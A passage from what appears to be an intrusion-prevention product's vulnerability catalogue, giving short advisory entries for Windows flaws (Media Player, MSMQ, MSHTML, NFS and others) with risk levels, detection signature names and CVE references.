Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Windows Media Encoder
Type: Buffer Overflow
Description: There is a stack buffer overflow in Microsoft Windows Media Encoder. The vulnerability is due to a boundary error while handling an overly large parameter passed to a function exposed by an ActiveX control in the WMEX.DLL library. A remote attacker can exploit the vulnerability by enticing the target user to visit a malicious web page. Successful exploitation causes a stack-based buffer overflow that may lead to arbitrary code execution in the security context of the logged in user.
Situation: HTTP_SS-Microsoft-Windows-Media-Encoder-9-ActiveX-Control-Buffer-Overflow
File-Text_Microsoft-Windows-Media-Encoder-9-ActiveX-Control-Buffer-Overflow
References:
CVE-2008-3008
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3008
BID-31065
http://www.securityfocus.com/bid/31065
MS08-053
http://technet.microsoft.com/security/bulletin/MS08-053
Back to top

Microsoft-Windows-Media-Encoder-Insecure-Library-Loading-CVE-2010-3965

About this vulnerability: A vulnerability in Microsoft Windows Media Encoder
Risk: High
First detected in: sgpkg-ips-362-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows Vista; Windows XP; Windows 2008
Software: Microsoft Windows Media Encoder
Type: Malfunction
Description: There is a vulnerability in Microsoft Windows Media Encoder.
Situation: HTTP_CSU-Microsoft-Windows-Media-Encoder-Insecure-Library-Loading-CVE-2010-3965
References:
CVE-2010-3965
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3965
BID-42855
http://www.securityfocus.com/bid/42855
MS10-094
http://technet.microsoft.com/security/bulletin/MS10-094
Back to top

Microsoft-Windows-Media-Format-ASF-Parsing-Code-Execution

About this vulnerability: A vulnerability in Microsoft Windows Media Format Runtime
Risk: High
First detected in: sgpkg-ips-136-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Windows Media Format Runtime; Windows Media Format Runtime x64 Edition; Windows Media Services
Type: Buffer Overflow
Description: There are multiple buffer overflow vulnerabilities in the Microsoft Windows Media Format processing engine. These vulnerabilities are caused by a boundary error when processing Advanced Systems Format (ASF) files. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted ASF file, potentially causing arbitrary code to be injected and executed in the security context of the currently logged in user.
Situation: HTTP_SS-Microsoft-Windows-Media-Format-ASF-Parsing-Code-Execution-JPEG
HTTP_SS-Microsoft-Windows-Media-Format-ASF-Parsing-Code-Execution-Sum
HTTP_SS-Microsoft-Windows-Media-Format-ASF-Parsing-Code-Execution-Spread
HTTP_SS-Microsoft-Windows-Media-Format-ASF-Parsing-Code-Execution-Sig
File-Binary_Microsoft-Windows-Media-Format-ASF-Parsing-Code-Execution-JPEG
File-Binary_Microsoft-Windows-Media-Format-ASF-Parsing-Code-Execution-Sum
File-Binary_Microsoft-Windows-Media-Format-ASF-Parsing-Code-Execution-Spread
File-Binary_Microsoft-Windows-Media-Format-ASF-Parsing-Code-Execution-Sig
References:
CVE-2007-0064
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0064
BID-26776
http://www.securityfocus.com/bid/26776
MS07-068
http://technet.microsoft.com/security/bulletin/MS07-068
Back to top

Microsoft-Windows-Media-Foundation-Memory-Corruption-CVE-2020-16915

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Critical
First detected in: sgpkg-ips-1287-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: A memory corruption vulnerability exists in Windows Media Foundation. A successful exploitation of this vulnerability can enable the attacker to install programs, access data and create new users on the target machine.
Situation: File-MPEG_Microsoft-Windows-Media-Foundation-Memory-Corruption-CVE-2020-16915
References:
CVE-2020-16915
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16915
ms20-oct
http://technet.microsoft.com/security/bulletin/ms20-oct
Back to top

Microsoft-Windows-Media-Foundation-Mfasfsrcsnk.dll-Type-Confusion

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1364-5242
Last changed: sgpkg-ips-1364-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A memory corruption vulnerability has been reported in Windows Media Foundation. The vulnerability is due to improper handling of objects in memory. A remote attacker could exploit this vulnerability by enticing an user to open a maliciously crafted file or web page. Successful exploitation could result in arbitrary code execution with user privileges.
Situation: File-Binary_Microsoft-Windows-Media-Foundation-Mfasfsrcsnk.dll-Type-Confusion
References:
CVE-2020-0738
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0738
Back to top

Microsoft-Windows-Media-MIDI-File-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-973-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There exists a memory corruption vulnerability in the Microsoft Windows Multimedia library. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Binary_Microsoft-Windows-Media-MIDI-File-Memory-Corruption
References:
CVE-2012-0003
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0003
BID-51292
http://www.securityfocus.com/bid/51292
MS12-004
http://technet.microsoft.com/security/bulletin/MS12-004
Back to top

Microsoft-Windows-Media-Playback-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Windows Media Format Runtime
Risk: Moderate
First detected in: sgpkg-ips-401-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A memory corruption vulnerability exists in the MP3 parser of Microsoft Windows Media Format. The vulnerability is due to the way that Microsoft Windows handles MP3 media files. A remote attacker can exploit this vulnerability by enticing the target to open a malicious mp3 file. In the case of successful code injection and execution, the behaviour of the target is dependent on the intention of the malicious code. The injected code will be executed with the privileges of the currently user. In the case where code execution is not successful, the application using the vulnerable component may terminate abnormally.
Situation: HTTP_SS-Microsoft-Windows-Media-Playback-Memory-Corruption
File-Binary_Microsoft-Windows-Media-Playback-Memory-Corruption
References:
CVE-2009-2499
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2499
BID-36228
http://www.securityfocus.com/bid/36228
MS09-047
http://technet.microsoft.com/security/bulletin/MS09-047
Back to top

Microsoft-Windows-Media-Player-Code-Execution-MS09-052

About this vulnerability: A parsing vulnerability in Windows Media Player
Risk: High
First detected in: sgpkg-ips-257-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Windows Media Player
Type: Buffer Overflow
Description: A vulnerability related to ASF file parsing in certain versions of Windows Media Player allows remote attackers to execute arbitrary code on vulnerably systems.
Situation: E-Mail_BS-Windows-Media-Player-ASF-CVE-2009-2527
HTTP_SS-Windows-Media-Player-ASF-CVE-2009-2527
File-Binary_Windows-Media-Player-ASF-CVE-2009-2527
References:
CVE-2009-2527
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2527
MS09-052
http://technet.microsoft.com/security/bulletin/MS09-052
Back to top

Microsoft-Windows-Media-Player-DVR-MS-Memory-Corruption

About this vulnerability: An attempt to exploit a vulnerability in Windows Media Player detected
Risk: Moderate
First detected in: sgpkg-ips-428-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Windows Media Player
Type: Malfunction
Description: An attempt to exploit a vulnerability in Microsoft Windows Media Player detected
Situation: File-Binary_Windows-Media-Player-DVR-MS-Memory-Corruption
References:
CVE-2011-3401
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3401
MS11-092
http://technet.microsoft.com/security/bulletin/MS11-092
Back to top

Microsoft-Windows-Media-Player-File-Information-Disclosure

About this vulnerability: A vulnerability in Microsoft Windows Media Player
Risk: Low
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Windows Media Player
Type: Malfunction
Description: There exists a vulnerability in Microsoft Windows Media Player. A remote attacker can use this to access sensitive information.
Situation: File-Text_Microsoft-Windows-Media-Player-File-Information-Disclosure
References:
CVE-2004-1325
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1325
BID-12032
http://www.securityfocus.com/bid/12032
Back to top

Microsoft-Windows-Media-Player-Media-Library-Manipulation

About this vulnerability: A vulnerability in Windows Media Player
Risk: High
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Windows Media Player
Type: Malfunction
Description: A vulnerability exists in the way the Microsoft Windows Media Player ActiveX Control accesses local multimedia files. A script embedded in an HTML page could use the ActiveX control to disclose or update information in the media library database. This vulnerability may be remotely leveraged by an attacker to obtain information on local multimedia files.
Situation: File-Text_Microsoft-Windows-Media-Player-Media-Library-Manipulation
Back to top

Microsoft-Windows-Media-Player-PNG-Image-Parsing-Buffer-Overflow

About this vulnerability: PNG image parsing buffer overflow in Microsoft Windows Media Player
Risk: High
First detected in: sgpkg-ips-69-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000; Windows XP; Windows 2003
Software: Windows Media Player
Type: Buffer Overflow
Description: Microsoft Windows Media Player has a vulnerability in the processing of the ancillary chunks in PNG images. The program does not check the size of the chunk data before the data is copied into a fixed size buffer. A remote attacker is able to exploit this vulnerability to execute arbitrary code on the victim machine.
Situation: HTTP_PNG-Image-With-Large-Data-Length-Value
E-Mail_BS-PNG-Image-With-Large-Data-Length-Value
File-PNG_PNG-Image-With-Large-Data-Length-Value
References:
CVE-2006-0025
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0025
BID-18385
http://www.securityfocus.com/bid/18385
OSVDB-26430
http://www.osvdb.org/26430
MS06-024
http://technet.microsoft.com/security/bulletin/MS06-024
Back to top

Microsoft-Windows-Media-Player-Skin-Parsing-Code-Execution

About this vulnerability: A vulnerability in Microsoft Windows Media Player
Risk: Moderate
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in Microsoft Windows Media Player. The vulnerability is due to insufficient data validation while parsing compressed skin files. A remote attacker can exploit this flaw by enticing the target user to open a crafted WMZ file, potentially causing arbitrary code to be injected and executed in the security context of the current user. In a simple attack case, the affected Windows Media Player may terminate when the malicious file is opened. In a sophisticated attack scenario, where the malicious user is successful in injecting and executing supplied code, the behaviour of the system is dependent on the nature of the injected code. Any code injected into the vulnerable component would execute in the security context of the currently logged in user.
Situation: File-Zip_Microsoft-Windows-Media-Player-Skin-Parsing-Code-Execution
References:
CVE-2007-3037
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3037
BID-25305
http://www.securityfocus.com/bid/25305
OSVDB-36385
http://www.osvdb.org/36385
MS07-047
http://technet.microsoft.com/security/bulletin/MS07-047
Back to top

Microsoft-Windows-Message-Queuing-Service-DoS-CVE-2023-21769

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1646-5242
Last changed: sgpkg-ips-1646-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A denial of service vulnerability has been reported for the Message Queuing Service in Microsoft Windows. The vulnerability is due to improper handling of incoming MSMQ packets. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted MSMQ packet to a MSMQ server. Successful exploitation of this vulnerability can result in the crash of the target service.
Situation: Generic_CS-Microsoft-Windows-Message-Queuing-Service-DoS-CVE-2023-21769
References:
CVE-2023-21769
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21769
Back to top

Microsoft-Windows-Message-Queuing-Service-DoS-CVE-2023-28302

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1646-5242
Last changed: sgpkg-ips-1646-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A denial of service vulnerability has been reported for Message Queuing Service in Microsoft Windows. The vulnerability is due to improper handling of the incoming MSMQ packets. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted MSMQ packet to a MSMQ server. Successful exploitation of this vulnerability can result in the denial of service on the target system.
Situation: Generic_CS-Microsoft-Windows-Message-Queuing-Service-DoS-CVE-2023-28302
References:
CVE-2023-28302
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28302
Back to top

Microsoft-Windows-Message-Queuing-Service-SRMP-DoS-CVE-2023-36606

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1646-5242
Last changed: sgpkg-ips-1646-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: A denial-of-service vulnerability has been reported in Microsoft Windows Message Queuing Service. The vulnerability is due to improper handling of the incoming MSMQ traffic. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted packet to a MSMQ server. Successful exploitation could result in the denial of service on the target machine.
Situation: IPv4_Microsoft-Windows-Message-Queuing-Service-SRMP-DoS-CVE-2023-36606
File-TextId_Microsoft-Windows-Message-Queuing-Service-SRMP-DoS-CVE-2023-36606
References:
CVE-2023-36606
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36606
Back to top

Microsoft-Windows-Messenger-ActiveX-Control-CVE-2011-1243

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-386-4219
Last changed: sgpkg-ips-1341-5242
Platform: Windows XP
Software: Microsoft Messenger
Type: Malfunction
Description: There is a vulnerability in Microsoft Messenger.
Situation: HTTP_SS-Microsoft-Windows-Messenger-ActiveX-Control-CVE-2011-1243
References:
CVE-2011-1243
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1243
BID-47197
http://www.securityfocus.com/bid/47197
OSVDB-71788
http://www.osvdb.org/71788
MS11-027
http://technet.microsoft.com/security/bulletin/MS11-027
Back to top

Microsoft-Windows-Messenger-ActiveX-Information-Disclosure

About this vulnerability: A vulnerability in Windows Messenger
Risk: High
First detected in: sgpkg-ips-584-5211
Last changed: sgpkg-ips-1341-5242
Platform: Windows
Software: Windows Messenger
Type: Input Validation
Description: There is an information disclosure vulnearbility in the "Messenger.UIAutomation.1" ActiveX control of Windows Messenger.
References:
CVE-2008-0082
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0082
BID-30551
http://www.securityfocus.com/bid/30551
MS08-050
http://technet.microsoft.com/security/bulletin/MS08-050
Back to top

Microsoft-Windows-Metafile-Setpalette-Entries-Heap-Overflow

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-973-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There exists a heap overflow vulnerability in the Metafile (WMF) rendering component of Microsoft Windows. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Binary_Microsoft-Windows-Metafile-Setpalette-Entries-Heap-Overflow
References:
CVE-2005-2124
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2124
BID-15356
http://www.securityfocus.com/bid/15356
Back to top

Microsoft-Windows-MF3216-Component-Heap-Based-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Windows MF3216 Component
Risk: High
First detected in: sgpkg-ips-1206-5242
Last changed: sgpkg-ips-1684-5242
Platform: Windows
Software: Microsoft Windows MF3216
Type: Buffer Overflow
Description: There exists a vulnerability in MF3216 component of Microsoft Windows, multiple versions, which allows remote attackers to execute arbitrary code by enticing a user to open a specially crafted file.
Situation: File-Binary_Microsoft-Windows-MF3216-Component-Heap-Based-Buffer-Overflow
File-RTF_Microsoft-Windows-MF3216-Component-Heap-Based-Buffer-Overflow
References:
CVE-2019-1439
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1439
Back to top

Microsoft-Windows-MFC-Document-Title-Updating-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-740-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: PowerZip
Type: Buffer Overflow
Description: There exists a stack buffer overflow vulnerability in Microsoft Windows MFC library mfc42.dll. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Zip_Microsoft-Windows-MFC-Document-Title-Updating-Buffer-Overflow
References:
CVE-2010-3227
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3227
BID-41333
http://www.securityfocus.com/bid/41333
MS10-074
http://technet.microsoft.com/security/bulletin/MS10-074
Back to top

Microsoft-Windows-MFC-Library-FileFind-Class-Heap-Overflow

About this vulnerability: A vulnerability in Microsoft Windows' Microsoft Foundation Classes shared library
Risk: High
First detected in: sgpkg-ips-123-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000; Windows XP; Windows 2003
Software: Microsoft Visual Studio; Microsoft Visual Studio .NET; Microsoft Visual Studio 2005; HP All-in-One Series; HP Photo & Imaging Gallery
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Microsoft Foundation Classes (MFC) shared library. The flaw resides in the FileFind Class. It could be exposed remotely via applications that use the FileFind class and pass user provided data to the affected function.
Situation: HTTP_SS-HP-HpqUtil-ActiveX-Component-ListFiles-Method-Buffer-Overflow
File-Text_HP-HpqUtil-ActiveX-Component-ListFiles-Method-Buffer-Overflow
References:
CVE-2007-4916
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4916
BID-25697
http://www.securityfocus.com/bid/25697
Back to top

Microsoft-Windows-MHTML-Information-Disclosure-CVE-2011-0096

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-375-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows Vista; Windows XP; Windows 2003; Windows 2008; Windows 7; Windows 2008 R2
Software: <os>
Type: Cross-site Scripting
Description: There is a vulnerability in Microsoft Windows.
Situation: HTTP_SHS-Microsoft-Windows-MHTML-Information-Disclosure-CVE-2011-0096-3
HTTP_SS-Microsoft-Windows-MHTML-Information-Disclosure-CVE-2011-0096
HTTP_SS-Microsoft-Windows-MHTML-Information-Disclosure-CVE-2011-0096-2
File-Text_Microsoft-Windows-MHTML-Information-Disclosure-CVE-2011-0096-2
File-Text_Microsoft-Windows-MHTML-Information-Disclosure-CVE-2011-0096
References:
CVE-2011-0096
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0096
BID-46055
http://www.securityfocus.com/bid/46055
OSVDB-70693
http://www.osvdb.org/70693
MS11-026
http://technet.microsoft.com/security/bulletin/MS11-026
Back to top

Microsoft-Windows-MIDI-Remote-Code-Execution-Vulnerability

About this vulnerability: Detected an attempt to exploit a vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-433-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: Detected an attempt to exploit a vulnerability in Microsoft Windows
Situation: File-Binary_Microsoft-Windows-MIDI-Remote-Code-Execution-Vulnerability
References:
CVE-2012-0003
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0003
BID-51292
http://www.securityfocus.com/bid/51292
MS12-004
http://technet.microsoft.com/security/bulletin/MS12-004
Back to top

Microsoft-Windows-Mjpeg-Media-Decompression-Code-Execution

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-402-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: A remote code execution vulnerability exists in Microsoft Windows DirectShow component. The vulnerability is caused by improper handling of compressed data in media files. An attacker can exploit this vulnerability by enticing a target user to open specially crafted media file. In attack scenarios where code execution is successful the injected code will be executed within the context of the currently logged in user. When code execution is not successful, the affected application may terminate abnormally, leading to a denial of service condition.
Situation: HTTP_SS-Microsoft-Windows-Mjpeg-Media-Decompression-Code-Execution
File-RIFF_Microsoft-Windows-Mjpeg-Media-Decompression-Code-Execution
References:
CVE-2010-1880
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1880
BID-40464
http://www.securityfocus.com/bid/40464
OSVDB-65222
http://www.osvdb.org/65222
MS10-033
http://technet.microsoft.com/security/bulletin/MS10-033
Back to top

Microsoft-Windows-MOTW-Security-Feature-Bypass-CVE-2024-30050

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1726-5242
Last changed: sgpkg-ips-1726-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A bypass for the Mark of the Web security feature has been reported in Microsoft Windows.
Situation: File-Binary_Microsoft-Windows-MOTW-Security-Feature-Bypass-CVE-2024-30050
References:
CVE-2024-30050
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-30050
ms24-may
http://technet.microsoft.com/security/bulletin/ms24-may
Back to top

Microsoft-Windows-Movie-Maker-And-Producer-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Producer
Risk: Moderate
First detected in: sgpkg-ips-389-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Producer; Microsoft Windows Movie Maker
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in Microsoft Windows Movie Maker and Microsoft Producer. The flaw is due to the way the affected products parse maliciously crafted project files. A remote attacker can leverage this vulnerability by enticing a target user to open a malicious file. A successful attack can result in the injection and execution of arbitrary code on a target system. The resulting code would execute within the security context of the logged in user. In an unsuccessful attack, the affected application may abnormally terminate.
Situation: HTTP_SS-Microsoft-Windows-Movie-Maker-And-Producer-Buffer-Overflow
File-OLE_Microsoft-Windows-Movie-Maker-And-Producer-Buffer-Overflow
References:
CVE-2010-0265
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0265
BID-38515
http://www.securityfocus.com/bid/38515
MS10-016
http://technet.microsoft.com/security/bulletin/MS10-016
Back to top

Microsoft-Windows-Movie-Maker-Insecure-Library-Loading-CVE-2010-3967

About this vulnerability: A vulnerability in Microsoft Movie Maker
Risk: High
First detected in: sgpkg-ips-362-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows Vista
Software: Microsoft Windows Movie Maker
Type: Malfunction
Description: There is a vulnerability in Microsoft Movie Maker.
Situation: HTTP_CSU-Microsoft-Windows-Movie-Maker-Insecure-Library-Loading-CVE-2010-3967
References:
CVE-2010-3067
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3067
MS10-093
http://technet.microsoft.com/security/bulletin/MS10-093
Back to top

Microsoft-Windows-Movie-Maker-Mediaclipstring-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Windows Movie Maker
Risk: Moderate
First detected in: sgpkg-ips-384-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Windows Movie Maker;
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in Microsoft Windows Movie Maker. The flaw is due to a boundary error in the way the affected product handles specially crafted MediaClipString data in a Movie Maker project file. A remote attacker can leverage this vulnerability by enticing a target user to open a malicious project file (.MSWMM). A successful attack can result in the injection and execution of arbitrary code on a target system. The resulting code would execute within the security context of the logged in user. In an unsuccessful attack, the affected application may abnormally terminate.
Situation: HTTP_SS-Microsoft-Windows-Movie-Maker-Mediaclipstring-Buffer-Overflow
File-OLE_Microsoft-Windows-Movie-Maker-Mediaclipstring-Buffer-Overflow
References:
CVE-2010-2564
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2564
BID-42268
http://www.securityfocus.com/bid/42268
MS10-050
http://technet.microsoft.com/security/bulletin/MS10-050
Back to top

Microsoft-Windows-MQ-Service-CVE-2025-21285-Null-Pointer-Dereference

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1841-5242
Last changed: sgpkg-ips-1841-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: Errors when handling MSMQ traffic cause a null pointer dereference vulnerability in Windows. A successful exploitation allows an attacker to cause a denial of service condition on the target system.
Situation: Generic_CS-Microsoft-Windows-Message-Queuing-Service-CVE-2025-21285-Null-Pointer-Dereference
References:
CVE-2025-21285
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21285
Back to top

Microsoft-Windows-MSCOMCTL.OCX-RCE-Vulnerability

About this vulnerability: Possibly malicious ActiveX in an OLE file
Risk: Moderate
First detected in: sgpkg-ips-468-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A malicious ActiveX control may allow remote code execution
Situation: File-OLE_Microsoft-Windows-MSCOMCTL.OCX-RCE-Vulnerability
File-RTF_Microsoft-Windows-MSCOMCTL.OCX-RCE-Vulnerability
References:
CVE-2012-1856
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1856
MS12-060
http://technet.microsoft.com/security/bulletin/MS12-060
Back to top

Microsoft-Windows-MSHTML-File-Extension-Spoofing-Remote-Code-Execution

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1837-5242
Last changed: sgpkg-ips-1837-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: Improper validation of file extensions causes a vulnerability in Windows which allows an attacker to spoof file names and entice users to open and execute malicious files.
Situation: HTTP_CSU-Microsoft-Windows-MSHTML-File-Extension-Spoofing-Remote-Code-Execution
References:
CVE-2024-43461
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43461
Back to top

Microsoft-Windows-MSHTML-Platform-Remote-Code-Execution-CVE-2023-35628

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1737-5242
Last changed: sgpkg-ips-1752-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A remote code execution vulnerability has been reported in Microsoft Windows. The vulnerability is due to improper processing of file paths. A remote attacker could exploit this vulnerability by sending crafted requests to the target server or enticing a victim to open a crafted file or link. Successful exploitation could result in the code execution in the security context of the user.
Situation: File-Text_Microsoft-Windows-MSHTML-Platform-Remote-Code-Execution-CVE-2023-35628
File-Binary_Microsoft-Windows-MSHTML-Platform-Remote-Code-Execution-CVE-2023-35628
File-TextId_Microsoft-Windows-MSHTML-Platform-Remote-Code-Execution-CVE-2023-35628
References:
CVE-2023-35628
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-35628
ms23-dec
http://technet.microsoft.com/security/bulletin/ms23-dec
Back to top

Microsoft-Windows-MSI-File-Signature-Spoofing-Vulnerability

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1272-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: There exists a spoofing vulnerability in Microsoft Windows. Successful exploitation could lead to spoofing of file content.
Situation: File-OLE_Microsoft-Windows-MSI-File-Signature-Spoofing-Vulnerability
References:
CVE-2020-1464
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1464
Back to top

Microsoft-Windows-Msvcrt.dll-Buffer-Overflow-CVE-2012-0150

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-440-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2008; Windows Vista; Windows 7
Software: <os>
Type: Malfunction
Description: There is a vulnerability in Microsoft Windows.
Situation: File-TextId_Microsoft-Windows-Msvcrt.dll-Buffer-Overflow-CVE-2012-0150
References:
CVE-2012-0150
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0150
MS12-013
http://technet.microsoft.com/security/bulletin/MS12-013
Back to top

Microsoft-Windows-NAT-Driver-Denial-Of-Service

About this vulnerability: A vulnerability in Microsoft Windows Server
Risk: High
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2012
Software: <os>
Type: Malfunction
Description: A denial-of-service vulnerability exists in Microsoft Windows' NAT driver. The vulnerability is due to insufficient validation of memory addresses when handling crafted ICMP packets. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted ICMP packet. Successful exploitation of this vulnerability would cause the operating system to become unresponsive resulting in a denial-of-service condition.
Situation: ICMP_Microsoft-Windows-NAT-Driver-Denial-Of-Service
References:
CVE-2013-3182
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3182
OSVDB-96195
http://www.osvdb.org/96195
MS13-064
http://technet.microsoft.com/security/bulletin/MS13-064
Back to top

Microsoft-Windows-NAT-Helper-DNS-Query-Denial-Of-Service

About this vulnerability: Denial of service vulnerability in Microsoft Windows NAT Helper
Risk: Moderate
First detected in: sgpkg-ips-84-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP
Software: <os>
Type: Malfunction
Description: There is a denial of service vulnerability in Microsoft Windows NAT Helper. By sending a malformed DNS query to the vulnerable service, a remote attacker can cause a null pointer deference error leading to a denial of service.
Situation: DNS-TCP_Microsoft-Windows-NAT-Helper-DNS-Query-Denial-Of-Service
DNS-UDP_Microsoft-Windows-NAT-Helper-DNS-Query-Denial-Of-Service
References:
CVE-2006-5614
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5614
BID-20804
http://www.securityfocus.com/bid/20804
OSVDB-30096
http://www.osvdb.org/30096
Back to top

Microsoft-Windows-Network-File-System-CVE-2022-30136-Remote-Code-Execution

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1483-5242
Last changed: sgpkg-ips-1483-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: Improper handling of NFSv4 requests causes a vulnerability in Windows. A successful exploit allows an attacker to execute arbitrary code on the target system or crash it.
Situation: Generic_CS-Microsoft-Windows-Network-File-System-CVE-2022-30136-Remote-Code-Execution
References:
CVE-2022-30136
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30136
Back to top

Microsoft-Windows-NFS-CVE-2022-26937

About this vulnerability: A vulnerability in the handling of NFS requests
Risk: High
First detected in: sgpkg-ips-1466-5242
Last changed: sgpkg-ips-1476-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There exists a unauthenticated remote code execution vulnerability in Windows NFS. Successful exploitation could lead in arbitrary code execution.
